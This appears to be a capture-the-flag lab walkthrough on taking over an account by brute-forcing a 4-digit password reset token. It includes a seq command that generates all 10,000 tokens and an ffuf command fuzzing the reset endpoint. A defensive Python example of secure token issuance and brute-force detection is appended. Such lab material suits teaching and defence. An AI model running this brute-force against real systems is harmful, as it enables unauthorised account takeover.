Brute-Forcing Password Reset Tokens
Take over another user's account on the target system to obtain the flag.
In order to exploit the password reset functionality we must first find the reset endpoint.
Step 1 - Access the Web Application and Reset the Password:

Step 2 - Insert a username and click Submit:

Step 3 - Click on here:

Step 4 - Get the password reset token endpoint:
You'll get this warning. Click Submit again:

And we have the endpoint:

Step 5 - Brute-force the reset token:
The token is a zero-padded 4-digit number, so create a numeric wordlist with all 10,000 possible values:
seq -w 0 9999 > tokens.txt
Use the wordlist to brute-force the token with ffuf, filtering out every response that contains the "invalid token" message (the URL is quoted so the shell does not expand the `?`):
ffuf -w ./tokens.txt -u "http://SERVER_IP:SERVER_PORT/reset_password.php?token=FUZZ" -fr "The provided token is invalid"
Step 6 - Reset the password:
Insert the token at the end of the URL:

Change the password:

Step 7 - Retrieve the flag:
After resetting the password, log in to the application with the new credentials and retrieve the flag:

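A defender's view of the weakness this lab relies on, added here as an example and not part of the original walkthrough: a zero-padded 4-digit token gives only 10,000 candidates (exactly the `seq -w 0 9999` list above), so the reset logic below issues a 256-bit random token, stores only its hash, expires it, makes it single-use, and counts invalid guesses per client so a sweep like the ffuf run is detected and blocked. The `store` and `failures` dictionaries and the client identifier are assumed in-memory stand-ins for a real database and request source.

```python
import hashlib
import secrets

TOKEN_BYTES = 32        # 256 bits of entropy; a 4-digit number has about 13 bits
TOKEN_TTL = 15 * 60     # seconds a reset token stays valid
MAX_FAILURES = 5        # invalid-token attempts per client before we alert and block


def weak_token_space(digits: int = 4) -> int:
    """Number of candidates for a zero-padded numeric token, i.e. 10**4 for seq -w 0 9999."""
    return 10 ** digits


def _digest(token: str) -> str:
    # Only the hash is persisted, so a leaked token table cannot be replayed as live tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_token(store: dict, username: str, now: float) -> str:
    """Create a single-use reset token for `username` and return the raw value to send out of band."""
    token = secrets.token_urlsafe(TOKEN_BYTES)
    store[_digest(token)] = {"user": username, "expires": now + TOKEN_TTL}
    return token


def verify_token(store: dict, failures: dict, client: str, token: str, now: float):
    """Return the username the token belongs to, or None on any failure.

    Invalid or expired tokens count against the presenting client; once the client
    exceeds MAX_FAILURES it is refused even for a correct token, which is the
    signal an operator should alert on (assumed: `client` is e.g. a source IP).
    """
    if failures.get(client, 0) >= MAX_FAILURES:
        return None                          # brute-force threshold already crossed
    key = _digest(token)
    entry = store.get(key)
    if entry is None or now > entry["expires"]:
        failures[client] = failures.get(client, 0) + 1
        return None
    del store[key]                           # single use: a token cannot be replayed
    return entry["user"]
```

The lookup is by hash of the presented value, so the guessing client never learns which stored token it was close to; with a 43-character random token there is no feasible wordlist to enumerate in the first place.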